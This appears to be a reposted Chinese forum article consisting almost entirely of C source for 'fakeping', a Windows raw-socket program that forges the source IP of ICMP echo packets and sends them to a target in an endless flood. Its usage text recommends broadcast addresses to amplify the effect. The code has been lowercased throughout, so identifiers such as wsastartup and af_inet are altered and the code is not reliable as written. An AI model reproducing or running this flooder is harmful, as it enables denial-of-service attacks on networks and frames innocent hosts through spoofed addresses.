信息来源:南京补天
文章作者:shotgun
复制内容到剪贴板
代码:
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#define seq 0x28376839
#define status_failed 0xffff //错误返回值
typedef struct _iphdr //定义ip首部
{
unsigned char h_verlen; //4位首部长度,4位ip版本号
unsigned char tos; //8位服务类型tos
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 ttl
unsigned char proto; //8位协议 (tcp, udp 或其他)
unsigned short checksum; //16位ip首部校验和
unsigned int sourceip; //32位源ip地址
unsigned int destip; //32位目的ip地址
}ip_header;
//
// 定义icmp首部
typedef struct _ihdr
{
byte i_type; //8位类型
byte i_code; //8位代码
ushort i_cksum; //16位校验和
ushort i_id; //识别号(一般用进程号作为识别号)
ushort i_seq; //报文序列号
ulong timestamp; //时间戳
}icmp_header;
//checksum:计算校验和的子函数
ushort checksum(ushort *buffer, int size)
{
unsigned long cksum=0;
while(size >1) {
cksum+=*buffer++;
size -=sizeof(ushort);
}
if(size ) {
cksum += *(uchar*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (ushort)(~cksum);
}
//fakeping主函数
int main(int argc, char **argv)
{
int datasize,errorcode,counter,flag;
int timeout=2000, sendseq=0, packetsize=32;
char sendbuf[65535]={0};
wsadata wsadata;
socket sockraw=(socket)null;
struct sockaddr_in destaddr;
ip_header ip_header;
icmp_header icmp_header;
char fakesourceip[20],destip[20];
//接受命令行参数
if (argc<3)
{
printf("fakeping by shotgun\n");
printf("\tthis program can do ping-flooding from a fakeip\n");
printf("\tusing a broadcast ip as the fakeip will enhance the effect\n");
printf("email:\n");
printf("\[email]tshotgun@xici.net[/email]\n");
printf("homepage:\n");
printf("\thttp://it.xici.net\n");
printf("\thttp://www.patching.net\n");
printf("usage:\n\tfakeping.exe fakesourceip destinationip [packetsize]\n");
printf("example:\n");
printf("\tfakeping.exe 192.168.15.23 192.168.15.255\n");
printf("\tfakeping.exe 192.168.15.23 192.168.15.200 6400\n");
exit(0);
}
strcpy(fakesourceip,argv[1]);
strcpy(destip,argv[2]);
if (argc>3) packetsize=atoi(argv[3]);
if (packetsize>60000)
{
printf("error! packet size too big, must <60k\n");
exit(0);
}
printf("now fake %s ping %s using packet size=%d bytes\n",
fakesourceip, destip, packetsize);
printf("\tctrl+c to quit\n");
//初始化sock_raw
if((errorcode=wsastartup(makeword(2,1),&wsadata))!=0)
{
fprintf(stderr,"wsastartup failed: %d\n",errorcode);
exitprocess(status_failed);
}
if((sockraw=wsasocket(af_inet,sock_raw,ipproto_raw,null,0,wsa_flag_overlapped))==invalid_socket)
{
fprintf(stderr,"wsasocket() failed: %d\n",wsagetlasterror());
exitprocess(status_failed);
}
flag=true;
//设置ip_hdrincl以自己填充ip首部
errorcode=setsockopt(sockraw,ipproto_ip,ip_hdrincl,(char *)&flag,sizeof(int));
if(errorcode==socket_error)
printf("set ip_hdrincl error!\n");
__try{
//设置发送超时
errorcode=setsockopt(sockraw,sol_socket,so_sndtimeo,(char*)&timeout,sizeof(timeout));
if (errorcode==socket_error)
{
fprintf(stderr,"failed to set send timeout: %d\n",wsagetlasterror());
__leave;
}
memset(&destaddr,0,sizeof(destaddr));
destaddr.sin_family=af_inet;
destaddr.sin_addr.s_addr=inet_addr(destip);
//填充ip首部
ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位ip版本号,低四位首部长度
ip_header.total_len=htons(sizeof(ip_header)+sizeof(icmp_header)); //16位总长度(字节)
ip_header.ident=1; //16位标识
ip_header.frag_and_flags=0; //3位标志位
ip_header.ttl=128; //8位生存时间 ttl
ip_header.proto=ipproto_icmp; //8位协议 (tcp, udp 或其他)
ip_header.checksum=0; //16位ip首部校验和
ip_header.sourceip=inet_addr(fakesourceip); //32位源ip地址
ip_header.destip=inet_addr(destip); //32位目的ip地址
//填充icmp首部
icmp_header.i_type = 8;
icmp_header.i_code = 0;
icmp_header.i_cksum = 0;
icmp_header.i_id = 2;
icmp_header.timestamp = 999;
icmp_header.i_seq=999;
memcpy(sendbuf, &icmp_header, sizeof(icmp_header));
memset(sendbuf+sizeof(icmp_header), ‘e‘, packetsize);
icmp_header.i_cksum = checksum((ushort *)sendbuf, sizeof(icmp_header)+packetsize);
memcpy(sendbuf,&ip_header,sizeof(ip_header));
memcpy(sendbuf+sizeof(ip_header), &icmp_header, sizeof(icmp_header));
memset(sendbuf+sizeof(ip_header)+sizeof(icmp_header), ‘e‘, packetsize);
memset(sendbuf+sizeof(ip_header)+sizeof(icmp_header)+packetsize, 0, 1);
//计算发送缓冲区的大小
datasize=sizeof(ip_header)+sizeof(icmp_header)+packetsize;
ip_header.checksum=checksum((ushort *)sendbuf,datasize);
//填充发送缓冲区
memcpy(sendbuf,&ip_header, sizeof(ip_header));
while(1)
{
sleep(100);
printf(".");
for(counter=0;counter<1024;counter++)
{
//发送icmp报文
errorcode=sendto(sockraw,sendbuf,datasize,0,(struct sockaddr*)&destaddr,sizeof(destaddr));
if (errorcode==socket_error) printf("\nsend error:%d\n",getlasterror());
}
}
}//end of try
__finally {
if (sockraw != invalid_socket) closesocket(sockraw);
wsacleanup();
}
return 0;
}
